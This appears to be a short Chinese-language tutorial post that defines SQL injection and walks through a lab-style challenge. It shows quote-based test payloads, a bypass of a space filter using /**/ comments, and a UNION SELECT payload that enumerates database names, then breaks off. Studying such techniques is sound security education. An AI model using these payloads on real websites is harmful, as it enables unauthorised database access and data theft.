時間:2024-02-14 10:20作者:下載吧人氣:16
所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。具體來說,它是利用現有應用程序,將(惡意)的SQL命令注入到后臺數據庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的數據庫,而不是按照設計者意圖去執行SQL語句。比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。
分別輸入1,2,3有對應的結果
使用’會報錯,于是
構造常用的sql語句:1′ and ‘1’=’1
沒有反應試一試1′ and ‘1’=’2
還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試
1and1=1
可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格
試一試1’/**/and/**/’1’=’1
發現有結果了:
于是構建sql語句:
判斷有那些數據庫:
1’/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/’1’=’1
網友評論